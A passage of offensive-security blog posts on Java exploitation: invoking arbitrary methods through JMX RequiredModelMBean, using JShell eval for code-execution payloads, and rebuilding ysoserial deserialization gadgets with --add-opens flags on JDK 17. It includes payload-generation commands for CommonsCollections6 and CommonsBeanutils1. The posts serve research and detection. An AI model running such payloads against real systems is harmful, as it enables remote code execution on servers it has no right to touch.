Java resources wishing to be manageable instantiate the RequiredModelMBean using the MBeanServer's createMBean method. The resource then sets the MBeanInfo and Descriptors for the RequiredModelMBean instance. The attributes and operations exposed via the ModelMBeanInfo for the ModelMBean are accessible from MBeans, connectors/adaptors like other MBeans. […]

– RequiredModelMBean (Java Platform SE 8)

So instead of having the wrapping MBean class use reflection to retrieve the MBean information from the interface class, a RequiredModelMBean allows to specify the set of attributes, operations, etc. by providing a ModelMBeanInfo with corresponding ModelMBeanAttributeInfo, ModelMBeanOperationInfo, etc.

That means, we can define what public instance attribute getters, setters, or regular methods we want to be invokable remotely.

Invoking Arbitrary Instance Methods

We can even define methods that do not fulfill the JavaBeans™ convention or MBeans design patterns like this example with java.io.File demonstrates:

This works with every serializable object and public instance method. Arguments also need to be serializable. Return values can only be retrieved if they are also serializable, however, this is not a requirement for invoking a method in the first place.

Invoking Arbitrary Static Methods

While working on the implementation of some of the insights described here into beanshooter, Tobias pointed out that it is also possible to invoke static methods on arbitrary classes.

At first I was baffled because when reading the implementation of RequiredModelMBean.invoke(String, Object[], String[]), there is no way to have targetObject being null. And my assumption was that for calling static methods, the object instance provided as first argument to Method.invoke(Object, Object...) must be null. However, I figured that my assumption was entirely wrong after reading the manual:

If the underlying method is static, then the specified obj argument is ignored. It may be null.

– Method.invoke(Object, Object...) (Java Platform SE 8)

Furthermore, it is not even required that the method is declared in a serializable class but any static method of any class can be specified! Awesome finding, Tobias!

So, for calling static methods, an additional Descriptor instance needs to be provided to the ModelMBeanOperationInfo constructor which holds a class field with the targeted class name.

The provided class field is read in RequiredModelMBean.invoke(String, Object[], String[]) and overrides the target class variable, which otherwise would be obtained by calling getClass() on the resource object.

So, for instance, for creating a ModelMBeanOperationInfo for System.setProperty(String, String), the following can be used:

As already said, for calling the static method, the resource managed by RequiredModelMBean can be any arbitrary serializable instance. So even a String suffices.

This works with any public static method regardless of the class it is declared in. But again, provided argument values still need to be serializable. And return values can only be retrieved if they are also serializable, however, this is not a requirement for invoking a method in the first place.

Conclusion

Even though exploitation of JMX is generally well understood and comprehensively researched, apparently no one had looked into the aspects described here.

So check your assumptions! Don't take things for granted, even when it seems everyone has already looked into it. Dive deep to understand it fully. You might be surprised.

Java Exploitation Restrictions in Modern JDK Times

11 April 2023 at 13:12
Java deserialization gadgets have a long history in context of vulnerability research and at least go back to the year 2015. One of the most popular tools providing a large set of different gadgets is ysoserial by Chris Frohoff. Recently, we observed increasing concerns from the community why several gadgets do not seem to work anymore with more recent versions of JDKs. In this blog post we try to summarize certain facts to reenable some capabilities which seemed to be broken. But our journey did not begin with deserialization in the first place but rather looking for alternative ways of executing Java code in recent JDK versions. In this blost post, we'll focus on OpenJDK and Oracle implementations. Defenders should therefore adjust their search patterns to these alternative code execution patterns accordingly.

ScriptEngineManager - It's Gone

Initially, our problems began on another exploitation track not related to deserialization. Often code execution payloads in Java end with a final call to java.lang.Runtime.getRuntime().exec(args), at  least in a proof-of-concept exploitation phase. But as a Red Team, we always try to maintain a low profile and avoid actions that may raise suspicion like spawing new (child) processes. This is a well-known and still hot topic discussed in the context of C2 frameworks today, especially when it comes to AV/EDR evasion techniques. But this can also be applied to Java exploitation. It is a well-known fact that an attacker has the choice between different approaches to stay within the JVM to execute arbitrary Java code, with new javax.script.ScriptEngineManager().getEngineByName(engineName).eval(scriptCode) probably being the most popular one over the last years. The input code used is usually based on JavaScript being executed by the referenced ScriptEngine available, e.g. Nashorn (or Rhino).

But since Nashorn was marked as deprecated in Java 11 (JEP 335), and removed entirely in Java 15 (JEP 372), this means that a target using a JDK version >= 15 won't process JavaScript payloads anymore by default. Instead of hoping for other manually added JavaScript engines by developers for a specific target, we could make use of a "new" Java code evaluation API: JShell, a read-eval-print loop (REPL) tool that was introduced with Java 9 (JEP 222). Mainly used in combination with a command line interface (CLI) for testing Java code snippets, it allows programmatic access as well (see JShell API). This new evaluation call reads like jdk.jshell.JShell.create().eval(javaCode), executing Java code snippets (not JavaScript!). Further call variants exist, too. We found this being mentioned already in 2019 used in context of a SpEL Injection payload. This all sounded to good to be true but nevertheless some restrictions seemed to apply.

"The input should be exactly one complete snippet of source code, that is, one expression, statement, variable declaration, method declaration, class declaration, or import."

So, we started to play with some Java code snippets using the JShell API. First, we realized that it is indeed possible to use import statements within such snippets but interestingly the subsequent statements were not executed anymore. This should have been expected by reading the quote above, i.e. one would have actually been restricted to a single statement per snippet.

We also learned that it makes a huge difference between using the CLI vs. the API programmatically. The jshell CLI tool supports the listing of pre-imported packages:

I.e. a code snippet in the CLI executing Files.createFile(java.nio.file.Paths.get("/tmp/RCE")); works just fine. Calling the eval method programmatically on a JShell instance instead gives a different result, namely Files not known in this context. As a side note, eval calls do not return any exception messages printed to stdout/stderr. For "debugging" purposes, the diagnostics methods helps a lot: jshell.diagnostics(events.get(0).snippet()).forEach(x -> System.out.println(x.getMessage(Locale.ENGLISH)));.

Thus, it seems that we don't have access to a lot of "useful" classes with the programmatic approach. But as you already might have guessed, using fully qualified class names can be used as well. We don't have to "fix" the import issue mentioned above but can still use all built-in JDK classes by referencing them accordingly: java.nio.file.Files.createFile(java.nio.file.Paths.get(\"/tmp/RCE\"));. This gives us again all the power needed to build (almost) arbitrary Java code payloads for exfiltrating data, putting them in a server response etc. pp.

Ysoserial - The Possible

Besides the fact, that we could now benefit from this approach to inject these kinds of payloads in various attacking scenarios, this blog post should also be about insecure deserialization exploitation. Starting with a well-known gadget CommonsCollections6, the original Runtime.getRuntime().exec(args) will be replaced with a JShell variant. Using the handy TransformerChain pattern, one simply has to replace the chain accordingly.


After a small adjustment to the pom.xml 

we're ready to rebuild the ysoserial package with maven. But creating a payload with a recent version of JDK (version 17 in our case) revealed the following error.

In JDK9, the Java Platform Module System (JPMS) was introduced based on the "historical" project Jigsaw. We highly recommend the reader to look through the historical timeline with the corresponding JEPs in this IBM Java tutorial. E.g. JEP 260 describes the fact that most internal JDK APIs should be encapsulated properly such that Getters and Setters have to be used for access/change of otherwise privately declared internal member variables. Also the new Java module structure should explicitely restrict access between different modules, i.e. declaring lists of exported packages will become a "must" to allow inter-module access via the new module descriptor module-info.java. Additionally, since JDK16 the default strategy with respect to Java Reflection API is set to "deny by default" (JEP 396).
The CommonsCollections library is not implemented as Java module so that by definition it falls in the category unnamed (compare with exception message above).

Browsing through the ysoserial GitHub issue tracker, it appears people seem to have similar problems recently. One of the best articles explaining this kind of issue comes from Oracle itself. The chapter "Illegal Reflective Access" nicely summarizes the adjustments to JDK versions with respect to access of otherwise inaccessible members between packages via Java Reflection API.

"Some tools and libraries use reflection to access parts of the JDK that are meant for internal use only. This is called illegal reflective access and by default is not permitted in JDK 16 and later.
...
Code that uses reflection to access private fields of exported java.* APIs will no longer work by default. The code will throw an InaccessibileObjectException."

Furthermore, Oracle states that

"If you need to use an internal API that has been made inaccessible, then use the --add-exports runtime option. You can also use --add-exports at compile time to access internal APIs. 

If you have to allow code on the class path to do deep reflection to access nonpublic members, then use the --add-opens option."

Since CommonsCollections6 (and most of other gadgets) make heavy use of the Java Reflection API via java.lang.reflect.Field.setAccessible(boolean flag), this restriction has to be taken into account accordingly. Oracle already gave the solution above. Note that the --add-exports parameter does not allow "deep reflection", i.e. access to otherwise private members. So, creating the payload using java --add-opens java.base/java.util=ALL-UNNAMED -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 "java.nio.file.Files.createFile(java.nio.file.Paths.get(\"/tmp/RCE\"));" works just fine and gives code execution in insecure deserialization sinks again.

Ysoserial - The Impossible

Another popular gadget is CommonsBeanutils1, still frequently used in these days to gain code execution through insecure deserialization. A short side note: this gadget chain uses Gadgets.createTemplatesImpl(cmd) to put your command into a Java statement, compiled then into bytecode which is executed later. Chris Frohoff already gave a nice hint in his code that instead of the java.lang.Runtime.getRuntime().exec(cmd) call, one "[...] could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections". That's already a powerful primitive which might not have been used by too many people over the last years (at least not been made public as popular choice).

But let's get back to trying to create a payload in JDK17 which unfortunately results in a different exception compared to CommonsCollections6.

This kind of error is expected, cross-checking with the Oracle article mentioned above, and can therefore be solved with the same approach: java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "[JAVA_CODE]" (see also Chris Frohoff's comment on an issue).

You might be aware of the deserializer test class in ysoserial. This can be called by piping the payload creation result directly into java -cp ./target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.Deserializer. You should first test this with our CommonsCollections6 case above.
But what if we do this with our successfully created CommonsBeanutils1 gadget?

Sounds familiar? Unfortunately, this scenario is equivalent to server side deserialization processing, i.e. no code execution! If you add the --add-opens parameters to the ysoserial.Deserializer as well, deserialization works as expected of course but in a remote attack scenario we obviously don't have control over this!

Since org.apache.commons.beanutils.PropertyUtilsBean tries to access com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl, traditional paths in gadget chains like TemplatesImpl turned out to be useless in most cases. This, again, is because third-party libraries known from ysoserial are not Java modules and the module system strongly protects internal JDK classes. If we check the module-info.java in JDKs java.xml/share/classes/ directory, no exports can be found matching these package names needed. Game over.

Conclusions

  • Use JShell instead of ScriptEngineManager for JDK versions >= 15 (side note: this is not available in JREs!). This is also relevant for Defenders searching for code execution patterns only based on Runtime.getRuntime().exec or ScriptEngineManager().getEngineByName(engineName).eval calls. Keep in mind, this already affects JDK versions >= 9.
  • For JDK versions < 16, use the --add-opens property Setters during payload creation.
  • For JDK versions >= 16, rely on known (or find new) Java deserialization gadgets which do not depend on access to internal JDK class members etc. However, check for the exported namespaces before giving up a certain gadget chain.

Blog moved to https://code-white.com/blog

5 July 2023 at 08:09

Hey,

we've moved our tech blog to our own homepage at https://code-white.com/blog. From now on, all fresh posts will go up there. We've also copied over all the old articles, so you won't miss anything. And don't worry, the existing Blogspot posts will remain intact to keep the existing links working. But from now on, make sure to check out https://code-white.com/blog and, if you're interested, our all new public vulnerabilities list.

See you there,
The CODE WHITE Team

❌
❌